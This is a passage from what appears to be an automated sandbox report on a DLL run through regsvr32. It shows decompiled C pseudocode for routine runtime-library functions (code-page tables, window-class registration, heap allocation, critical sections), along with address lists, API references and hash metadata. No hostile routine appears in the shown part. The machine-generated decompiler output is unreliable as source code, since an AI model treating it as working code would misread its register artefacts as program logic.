				signed int _t74;
				signed char* _t78;
				signed char* _t79;
				void* _t81;
				void* _t86;
				void* _t87;

				_t80 = __edi;
				_t63 = __ebx;
				_t42 =  *0x1004c470; // 0x303bb91f
				_v8 = _t42;
				if(GetCPInfo( *0x10050b84,  &_v28) != 1) {
					_t45 = 0;
					__eflags = 0;
					do {
						__eflags = _t45 - 0x41;
						if(_t45 < 0x41) {
							L23:
							__eflags = _t45 - 0x61;
							if(_t45 < 0x61) {
								L26:
								 *(_t45 + 0x10050ba0) = 0;
							} else {
								__eflags = _t45 - 0x7a;
								if(_t45 > 0x7a) {
									goto L26;
								} else {
									 *(_t45 + 0x10050a81) =  *(_t45 + 0x10050a81) | 0x00000020;
									_t68 = _t45 - 0x20;
									goto L22;
								}
							}
						} else {
							__eflags = _t45 - 0x5a;
							if(_t45 > 0x5a) {
								goto L23;
							} else {
								 *(_t45 + 0x10050a81) =  *(_t45 + 0x10050a81) | 0x00000010;
								_t68 = _t45 + 0x20;
								__eflags = _t68;
								L22:
								 *(_t45 + 0x10050ba0) = _t68;
							}
						}
						_t45 = _t45 + 1;
						__eflags = _t45 - 0x100;
					} while (_t45 < 0x100);
				} else {
					_t47 = 0;
					do {
						 *((char*)(_t86 + _t47 - 0x118)) = _t47;
						_t47 = _t47 + 1;
					} while (_t47 < 0x100);
					_t48 = _v22;
					_v284 = 0x20;
					if(_t48 != 0) {
						_push(__ebx);
						_t78 =  &_v21;
						_push(__edi);
						do {
							_t65 =  *_t78 & 0x000000ff;
							_t59 = _t48 & 0x000000ff;
							if(_t59 <= _t65) {
								_t73 = _t65 - _t59 + 1;
								_t74 = _t73 >> 2;
								_t81 = _t86 + _t59 - 0x118;
								memset(_t81 + _t74, memset(_t81, 0x20202020, _t74 << 2), (_t73 & 0x00000003) << 0);
								_t87 = _t87 + 0x18;
								_t65 = 0;
							}
							_t79 =  &(_t78[1]);
							_t48 =  *_t79;
							_t78 =  &(_t79[1]);
							_t96 = _t48;
						} while (_t48 != 0);
						_pop(_t80);
						_pop(_t63);
					}
					_push(0);
					_push( *0x10050a68);
					_push( *0x10050b84);
					_push( &_v1308);
					_push(0x100);
					_push( &_v284);
					_push(1);
					E1001843D(_t63, _t65, _t80, 0x100, _t96);
					_push(0);
					_push( *0x10050b84);
					_push(0x100);
					_push( &_v540);
					_push(0x100);
					_push( &_v284);
					_push(0x100);
					_push( *0x10050a68);
					E10018081(_t63, _t80, 0x100, _t96);
					_push(0);
					_push( *0x10050b84);
					_push(0x100);
					_push( &_v796);
					_push(0x100);
					_push( &_v284);
					_push(0x200);
					_push( *0x10050a68);
					E10018081(_t63, _t80, 0x100, _t96);
					_t58 = 0;
					do {
						_t70 =  *((intOrPtr*)(_t86 + _t58 * 2 - 0x518));
						if((_t70 & 0x00000001) == 0) {
							__eflags = _t70 & 0x00000002;
							if((_t70 & 0x00000002) == 0) {
								 *((char*)(_t58 + 0x10050ba0)) = 0;
							} else {
								 *(_t58 + 0x10050a81) =  *(_t58 + 0x10050a81) | 0x00000020;
								_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x318));
								goto L12;
							}
						} else {
							 *(_t58 + 0x10050a81) =  *(_t58 + 0x10050a81) | 0x00000010;
							_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x218));
							L12:
							 *((char*)(_t58 + 0x10050ba0)) = _t71;
						}
						_t58 = _t58 + 1;
					} while (_t58 < 0x100);
				}
				return E100117AE(_t45, _v8);
			}





























                                                                        0x100128a7
                                                                        0x100128a7
                                                                        0x100128b0
                                                                        0x100128b5
                                                                        0x100128d1
                                                                        0x100129e4
                                                                        0x100129e4
                                                                        0x100129e6
                                                                        0x100129e6
                                                                        0x100129e9
                                                                        0x10012a04
                                                                        0x10012a04
                                                                        0x10012a07
                                                                        0x10012a1c
                                                                        0x10012a1c
                                                                        0x10012a09
                                                                        0x10012a09
                                                                        0x10012a0c
                                                                        0x00000000
                                                                        0x10012a0e
                                                                        0x10012a0e
                                                                        0x10012a17
                                                                        0x00000000
                                                                        0x10012a17
                                                                        0x10012a0c
                                                                        0x100129eb
                                                                        0x100129eb
                                                                        0x100129ee
                                                                        0x00000000
                                                                        0x100129f0
                                                                        0x100129f0
                                                                        0x100129f9
                                                                        0x100129f9
                                                                        0x100129fc
                                                                        0x100129fc
                                                                        0x100129fc
                                                                        0x100129ee
                                                                        0x10012a23
                                                                        0x10012a24
                                                                        0x10012a24
                                                                        0x100128d7
                                                                        0x100128d7
                                                                        0x100128d9
                                                                        0x100128d9
                                                                        0x100128e0
                                                                        0x100128e1
                                                                        0x100128e5
                                                                        0x100128ea
                                                                        0x100128f1
                                                                        0x100128f3
                                                                        0x100128f4
                                                                        0x100128f7
                                                                        0x100128f8
                                                                        0x100128f8
                                                                        0x100128fb
                                                                        0x10012900
                                                                        0x10012904
                                                                        0x10012907
                                                                        0x1001290a
                                                                        0x1001291d
                                                                        0x1001291d
                                                                        0x1001291d
                                                                        0x1001291d
                                                                        0x1001291f
                                                                        0x10012920
                                                                        0x10012922
                                                                        0x10012923
                                                                        0x10012923
                                                                        0x10012927
                                                                        0x10012928
                                                                        0x10012928
                                                                        0x10012929
                                                                        0x1001292b
                                                                        0x10012937
                                                                        0x1001293d
                                                                        0x1001293e
                                                                        0x10012945
                                                                        0x10012946
                                                                        0x10012948
                                                                        0x1001294d
                                                                        0x1001294f
                                                                        0x1001295b
                                                                        0x1001295c
                                                                        0x1001295d
                                                                        0x10012964
                                                                        0x10012965
                                                                        0x10012966
                                                                        0x1001296c
                                                                        0x10012971
                                                                        0x10012973
                                                                        0x1001297f
                                                                        0x10012980
                                                                        0x10012981
                                                                        0x10012988
                                                                        0x10012989
                                                                        0x1001298e
                                                                        0x10012994
                                                                        0x1001299c
                                                                        0x1001299e
                                                                        0x1001299e
                                                                        0x100129a9
                                                                        0x100129c1
                                                                        0x100129c4
                                                                        0x100129d6
                                                                        0x100129c6
                                                                        0x100129c6
                                                                        0x100129cd
                                                                        0x00000000
                                                                        0x100129cd
                                                                        0x100129ab
                                                                        0x100129ab
                                                                        0x100129b2
                                                                        0x100129b9
                                                                        0x100129b9
                                                                        0x100129b9
                                                                        0x100129dd
                                                                        0x100129de
                                                                        0x100129e2
                                                                        0x10012a32

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Info
                                                                        • String ID: $
                                                                        • API String ID: 1807457897-3032137957
                                                                        • Opcode ID: e1feaf72be715a4ff1946e31e99b5ac143a73204088819c920269db308c45d83
                                                                        • Instruction ID: 0aa4f3d34f00a4262c94cc47b2ead2c87a4a0533aa2425fc92cd258cd4020972
                                                                        • Opcode Fuzzy Hash: e1feaf72be715a4ff1946e31e99b5ac143a73204088819c920269db308c45d83
                                                                        • Instruction Fuzzy Hash: 304106B15043AC9FEB55CA68CC95BEE7BA8EF05304F2044E1E981DB162C7708AD5D791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10021810 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 78%
                                                                        			E10021810(void* __ecx, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct _WNDCLASSA _v44;
				void* __ebx;
				void* __ebp;
				void* _t25;
				intOrPtr _t37;
				void* _t38;
				struct HINSTANCE__* _t41;
				CHAR* _t43;

				_t38 = __ecx;
				_t43 = E100373A5() + 0x7c;
				_t25 = E100373B5();
				_t37 = _a8;
				_t41 =  *(_t25 + 8);
				if(_t37 != 0 || _a12 != _t37) {
					L4:
					_push(_a16);
					_push(_a12);
					_push(_t37);
					_push(_a4);
					E10012068(_t37, _t38, __eflags, _t43, "Afx:%p:%x:%p:%p:%p", _t41);
					goto L5;
				} else {
					_t49 = _a16 - _t37;
					if(_a16 != _t37) {
						goto L4;
					}
					_push(_a4);
					E10012068(_t37, _t38, _t49, _t43, "Afx:%p:%x", _t41);
					L5:
					if(GetClassInfoA(_t41, _t43,  &_v44) == 0) {
						_v44.style = _a4;
						_v44.lpfnWndProc = DefWindowProcA;
						_v44.cbWndExtra = 0;
						_v44.cbClsExtra = 0;
						_v44.lpszMenuName = 0;
						_v44.hIcon = _a16;
						_t40 = _a12;
						_push( &_v44);
						_v44.hInstance = _t41;
						_v44.hCursor = _t37;
						_v44.hbrBackground = _a12;
						_v44.lpszClassName = _t43;
						if(E10020B9B() == 0) {
							E10028C0C(_t40);
						}
					}
					return _t43;
				}
			}











                                                                        0x10021810
                                                                        0x10021820
                                                                        0x10021823
                                                                        0x10021828
                                                                        0x1002182d
                                                                        0x10021830
                                                                        0x10021850
                                                                        0x10021850
                                                                        0x10021853
                                                                        0x10021856
                                                                        0x10021857
                                                                        0x10021861
                                                                        0x00000000
                                                                        0x10021837
                                                                        0x10021837
                                                                        0x1002183a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002183c
                                                                        0x10021846
                                                                        0x10021869
                                                                        0x10021877
                                                                        0x1002187f
                                                                        0x10021887
                                                                        0x1002188c
                                                                        0x1002188f
                                                                        0x10021892
                                                                        0x10021895
                                                                        0x10021898
                                                                        0x1002189e
                                                                        0x1002189f
                                                                        0x100218a2
                                                                        0x100218a5
                                                                        0x100218a8
                                                                        0x100218b2
                                                                        0x100218b4
                                                                        0x100218b4
                                                                        0x100218b2
                                                                        0x100218bf
                                                                        0x100218bf

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ClassInfo
                                                                        • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
                                                                        • API String ID: 3534257612-2801496823
                                                                        • Opcode ID: bac3525874c531d32c2609508dd072fba15194ad53eac21eeb6b2515cb8fd036
                                                                        • Instruction ID: 52b857fe777198d334fd01ba6041a527614e5ef36dd32a96c670ed063e64d698
                                                                        • Opcode Fuzzy Hash: bac3525874c531d32c2609508dd072fba15194ad53eac21eeb6b2515cb8fd036
                                                                        • Instruction Fuzzy Hash: 77214DB5D00259AFDB01DFA5D8819DEBBF8FF58290F41402AF908E7201E7309A50CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100165C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 95%
                                                                        			E100165C9() {
				signed int _v8;
				char _v12;
				void* __ecx;
				void* __esi;
				CHAR* _t10;
				signed int _t16;
				signed int _t22;
				CHAR* _t25;
				signed int _t34;
				intOrPtr _t45;

				_push(_t27);
				_t45 =  *0x10050cac; // 0x1
				if(_t45 == 0) {
					E10012D82();
				}
				 *0x1004f6fc = 0;
				GetModuleFileNameA(0, 0x1004f5f8, 0x104);
				_t10 =  *0x10050cb0; // 0x2f03388
				 *0x1004f410 = 0x1004f5f8;
				if(_t10 == 0) {
					L4:
					_t25 = 0x1004f5f8;
				} else {
					_t25 = _t10;
					if( *_t10 == 0) {
						goto L4;
					}
				}
				E1001645D(_t25, 0,  &_v12, 0,  &_v8);
				_t40 = _v8 << 2;
				_t16 = E100107B6(_v12 + (_v8 << 2));
				_t34 = _t16;
				if(_t34 != 0) {
					E1001645D(_t25, _t40 + _t34,  &_v12, _t34,  &_v8);
					 *0x1004f3f4 = _v8 - 1;
					 *0x1004f3f8 = _t34;
					_t22 = 0;
				} else {
					_t22 = _t16 | 0xffffffff;
				}
				return _t22;
			}













                                                                        0x100165cd
                                                                        0x100165d3
                                                                        0x100165d9
                                                                        0x100165db
                                                                        0x100165db
                                                                        0x100165ec
                                                                        0x100165f3
                                                                        0x100165f9
                                                                        0x10016600
                                                                        0x10016606
                                                                        0x1001660f
                                                                        0x1001660f
                                                                        0x10016608
                                                                        0x1001660b
                                                                        0x1001660d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001660d
                                                                        0x1001661d
                                                                        0x10016628
                                                                        0x1001662e
                                                                        0x10016633
                                                                        0x1001663a
                                                                        0x1001664e
                                                                        0x10016658
                                                                        0x1001665e
                                                                        0x10016664
                                                                        0x1001663c
                                                                        0x1001663c
                                                                        0x1001663c
                                                                        0x1001666a

                                                                        APIs
                                                                        • ___initmbctable.LIBCMT ref: 100165DB
                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\regsvr32.exe,00000104,00000000,?,?,?,?,?,1001125B,?,?,?,10011379,?,?), ref: 100165F3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: FileModuleName___initmbctable
                                                                        • String ID: C:\Windows\SysWOW64\regsvr32.exe
                                                                        • API String ID: 767393020-3922119987
                                                                        • Opcode ID: 0838e9af58f791c0da82764b77dea048edf17fc93264d08f26370cd1291f3d76
                                                                        • Instruction ID: 1de5955471f92093fdaebd9574c573a93ec7bfc48d4baa4f39bbab7b9738bcfe
                                                                        • Opcode Fuzzy Hash: 0838e9af58f791c0da82764b77dea048edf17fc93264d08f26370cd1291f3d76
                                                                        • Instruction Fuzzy Hash: 3F110AB6A04224AFD700CF99DC8599F7BE8EB4A360F21016DF915D7240EA70EE80CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10024C8E Relevance: 5.1, APIs: 4, Instructions: 107stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 97%
                                                                        			E10024C8E(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a11, CHAR* _a12, char* _a16, intOrPtr _a20) {
				intOrPtr _v8;
				char _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				void* __ebp;
				intOrPtr _t39;
				int _t40;
				void* _t50;
				char* _t51;
				intOrPtr _t52;
				char* _t61;
				signed int _t62;
				CHAR* _t64;
				signed int _t73;
				void* _t74;
				CHAR* _t82;
				intOrPtr _t85;
				intOrPtr _t87;

				_t39 =  *0x1004c470; // 0x303bb91f
				_v8 = _t39;
				_v272 = __ecx;
				if(_a12 == 0) {
					L10:
					_t40 = 0;
					__eflags = 0;
					L11:
					return E100117AE(_t40, _v8);
				}
				_t73 = _a8 << 2;
				_t85 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) + _t73)) - 0xc));
				if(_t85 == 0) {
					goto L10;
				}
				_t77 = _a4;
				_t82 = E100017D0(_a4, _t85 + 1);
				if(_t82 == 0) {
					E1001CE3B(_t77);
				}
				_t74 = lstrcpynA;
				lstrcpynA(_t82,  *( *((intOrPtr*)(_v272 + 8)) + _t73), _t85 + 1);
				_t50 = E10038481(_t82, 0, 0);
				_t51 = _a16;
				_t87 = _t85 - _t50 + 1;
				_v276 = _t87;
				if(_t87 != _t51) {
					L7:
					_t52 = _v272;
					__eflags =  *((intOrPtr*)(_t52 + 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t52 + 0x18)) != 0xffffffff) {
						_a12 = _t87 + _t82;
						E1002565C(_t82, 0x104, _t87 + _t82,  &_v268, 0x104);
						__eflags = 0x104;
						lstrcpynA(_a12,  &_v268, 0x104 - _v276);
						E10024AA1(__eflags, _t82,  *((intOrPtr*)(_v272 + 0x18)), _a20);
					}
					goto L9;
				} else {
					_t61 = _t51 + _t82;
					_a11 =  *((intOrPtr*)(_t87 + _t82));
					_a16 = _t61;
					 *_t61 = 0;
					_t62 = lstrcmpiA(_a12, _t82);
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					_a12 = _t64;
					 *((char*)(_t87 + _t82)) = _a11;
					if(_t64 == 0) {
						goto L7;
					}
					E1002565C(_t82, 0x104, _a16,  &_v268, 0x104);
					lstrcpynA(_t82,  &_v268, 0x104);
					L9:
					E10006CE2(_t74, _a4, _t82, 0xffffffff);
					_t40 = 1;
					goto L11;
				}
			}





















                                                                        0x10024c9b
                                                                        0x10024ca1
                                                                        0x10024ca5
                                                                        0x10024cab
                                                                        0x10024db7
                                                                        0x10024db7
                                                                        0x10024db7
                                                                        0x10024db9
                                                                        0x10024dc4
                                                                        0x10024dc4
                                                                        0x10024cb7
                                                                        0x10024cbd
                                                                        0x10024cc2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10024cc8
                                                                        0x10024cd5
                                                                        0x10024cd9
                                                                        0x10024cdb
                                                                        0x10024cdb
                                                                        0x10024cf0
                                                                        0x10024cf7
                                                                        0x10024cfe
                                                                        0x10024d05
                                                                        0x10024d08
                                                                        0x10024d0b
                                                                        0x10024d11
                                                                        0x10024d5d
                                                                        0x10024d5d
                                                                        0x10024d63
                                                                        0x10024d67
                                                                        0x10024d7a
                                                                        0x10024d7d
                                                                        0x10024d82
                                                                        0x10024d93
                                                                        0x10024da2
                                                                        0x10024da2
                                                                        0x00000000
                                                                        0x10024d13
                                                                        0x10024d1a
                                                                        0x10024d1c
                                                                        0x10024d1f
                                                                        0x10024d22
                                                                        0x10024d25
                                                                        0x10024d2d
                                                                        0x10024d2f
                                                                        0x10024d30
                                                                        0x10024d36
                                                                        0x10024d39
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10024d4b
                                                                        0x10024d59
                                                                        0x10024da7
                                                                        0x10024dac
                                                                        0x10024db3
                                                                        0x00000000
                                                                        0x10024db4

                                                                        APIs
                                                                        • lstrcpynA.KERNEL32(00000000,?,?,?), ref: 10024CF7
                                                                        • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 10024D25
                                                                        • lstrcpynA.KERNEL32(00000000,?,00000104,?,?,00000104), ref: 10024D59
                                                                          • Part of subcall function 1002565C: GetFileTitleA.COMDLG32(?,?,00000000,00000000,00000104), ref: 1002568C
                                                                        • lstrcpynA.KERNEL32(00000000,?,?,?,?,00000104,00000000,00000000,00000000), ref: 10024D93
                                                                          • Part of subcall function 10024AA1: lstrlenA.KERNEL32(?), ref: 10024AAC
                                                                          • Part of subcall function 10024AA1: lstrcpyA.KERNEL32(?,?,?,00000000,00000000), ref: 10024B2D
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcpyn$FileTitlelstrcmpilstrcpylstrlen
                                                                        • String ID:
                                                                        • API String ID: 1551867014-0
                                                                        • Opcode ID: c3aea5b0b5321b77845ea1e1ecdd5d5eec89cf7256d8616176723767fef7d287
                                                                        • Instruction ID: f695b848086fad3498a552c61b02124914b138edf6a9cb0088e4b153e3f01fcd
                                                                        • Opcode Fuzzy Hash: c3aea5b0b5321b77845ea1e1ecdd5d5eec89cf7256d8616176723767fef7d287
                                                                        • Instruction Fuzzy Hash: 39418B76900269AFCB51CF68DC80EEA77F9EF49344F010199F99997251DB70EE81CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10013EDE Relevance: 5.1, APIs: 4, Instructions: 57memoryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10013EDE() {
				signed int _t15;
				void* _t17;
				void* _t18;
				intOrPtr* _t20;
				void* _t24;
				signed int _t26;
				void* _t27;
				intOrPtr* _t30;

				_t15 =  *0x10050a48; // 0x0
				_t26 =  *0x10050a58; // 0x0
				if(_t15 != _t26) {
					L4:
					_t27 =  *0x10050a4c; // 0x0
					_t30 = _t27 + (_t15 + _t15 * 4) * 4;
					_t17 = HeapAlloc( *0x10050a60, 8, 0x41c4);
					 *(_t30 + 0x10) = _t17;
					if(_t17 != 0) {
						_t18 = VirtualAlloc(0, 0x100000, 0x2000, 4);
						 *(_t30 + 0xc) = _t18;
						if(_t18 != 0) {
							 *(_t30 + 8) =  *(_t30 + 8) | 0xffffffff;
							 *_t30 = 0;
							 *((intOrPtr*)(_t30 + 4)) = 0;
							 *0x10050a48 =  *0x10050a48 + 1;
							 *( *(_t30 + 0x10)) =  *( *(_t30 + 0x10)) | 0xffffffff;
							_t20 = _t30;
						} else {
							HeapFree( *0x10050a60, 0,  *(_t30 + 0x10));
							goto L5;
						}
					} else {
						L5:
						_t20 = 0;
					}
					return _t20;
				} else {
					_t2 = _t26 * 4; // 0x50
					_t24 = HeapReAlloc( *0x10050a60, 0,  *0x10050a4c, _t26 + _t2 + 0x50 << 2);
					if(_t24 != 0) {
						 *0x10050a58 =  *0x10050a58 + 0x10;
						 *0x10050a4c = _t24;
						_t15 =  *0x10050a48; // 0x0
						goto L4;
					} else {
						return 0;
					}
				}
			}











                                                                        0x10013ede
                                                                        0x10013ee3
                                                                        0x10013eee
                                                                        0x10013f24
                                                                        0x10013f24
                                                                        0x10013f3b
                                                                        0x10013f3e
                                                                        0x10013f46
                                                                        0x10013f49
                                                                        0x10013f5c
                                                                        0x10013f64
                                                                        0x10013f67
                                                                        0x10013f7b
                                                                        0x10013f7f
                                                                        0x10013f81
                                                                        0x10013f84
                                                                        0x10013f8d
                                                                        0x10013f90
                                                                        0x10013f69
                                                                        0x10013f73
                                                                        0x00000000
                                                                        0x10013f73
                                                                        0x10013f4b
                                                                        0x10013f4b
                                                                        0x10013f4b
                                                                        0x10013f4b
                                                                        0x10013f94
                                                                        0x10013ef0
                                                                        0x10013ef0
                                                                        0x10013f05
                                                                        0x10013f0d
                                                                        0x10013f13
                                                                        0x10013f1a
                                                                        0x10013f1f
                                                                        0x00000000
                                                                        0x10013f0f
                                                                        0x10013f12
                                                                        0x10013f12
                                                                        0x10013f0d

                                                                        APIs
                                                                        • HeapReAlloc.KERNEL32(00000000,00000050,00000000,100144CF,00000000,?,00000000), ref: 10013F05
                                                                        • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,100144CF,00000000,?,00000000), ref: 10013F3E
                                                                        • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 10013F5C
                                                                        • HeapFree.KERNEL32(00000000,?), ref: 10013F73
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocHeap$FreeVirtual
                                                                        • String ID:
                                                                        • API String ID: 3499195154-0
                                                                        • Opcode ID: a18a375ed843d8de620d0934ad43bbd3cfe597e7cee0163713e7808ce4255d75
                                                                        • Instruction ID: aeb6b17fbef21620812925e1521d5c5e2c0640cb2d2eb2dc13b54a0eeae557ec
                                                                        • Opcode Fuzzy Hash: a18a375ed843d8de620d0934ad43bbd3cfe597e7cee0163713e7808ce4255d75
                                                                        • Instruction Fuzzy Hash: D0116D346003659FE761CF19DCC5D1A7BB1FB81760710852DF156DA5B1C3719882DB01
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10037A1B Relevance: 5.0, APIs: 4, Instructions: 33COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10037A1B(signed int _a4) {
				struct _CRITICAL_SECTION* _t13;
				signed int _t21;
				intOrPtr* _t24;

				if( *0x1004f350 == 0) {
					E100379F7();
				}
				_t21 = _a4;
				_t24 = 0x1004f158 + _t21 * 4;
				if( *_t24 == 0) {
					EnterCriticalSection(0x1004f19c);
					if( *_t24 == 0) {
						InitializeCriticalSection(0x1004f1b8 + (_t21 + _t21 * 2) * 8);
						 *_t24 =  *_t24 + 1;
					}
					LeaveCriticalSection(0x1004f19c);
				}
				_t13 = 0x1004f1b8 + (_t21 + _t21 * 2) * 8;
				EnterCriticalSection(_t13);
				return _t13;
			}






                                                                        0x10037a22
                                                                        0x10037a24
                                                                        0x10037a24
                                                                        0x10037a32
                                                                        0x10037a36
                                                                        0x10037a40
                                                                        0x10037a49
                                                                        0x10037a4e
                                                                        0x10037a5b
                                                                        0x10037a61
                                                                        0x10037a61
                                                                        0x10037a64
                                                                        0x10037a6a
                                                                        0x10037a6e
                                                                        0x10037a76
                                                                        0x10037a7b

                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(1004F19C,?,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A49
                                                                        • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A5B
                                                                        • LeaveCriticalSection.KERNEL32(1004F19C,?,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A64
                                                                        • EnterCriticalSection.KERNEL32(00000000,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A76
                                                                          • Part of subcall function 100379F7: InitializeCriticalSection.KERNEL32(1004F19C,10037A29,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A0F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$EnterInitialize$Leave
                                                                        • String ID:
                                                                        • API String ID: 713024617-0
                                                                        • Opcode ID: 2a6b980db9533a80bee2071cb613a1de34b70dec757d7447317d0fbaf167c0ba
                                                                        • Instruction ID: b71c326a3937b492ac304e5451021ab9c1c46bd2d9d00a0dd2066787caa8deb7
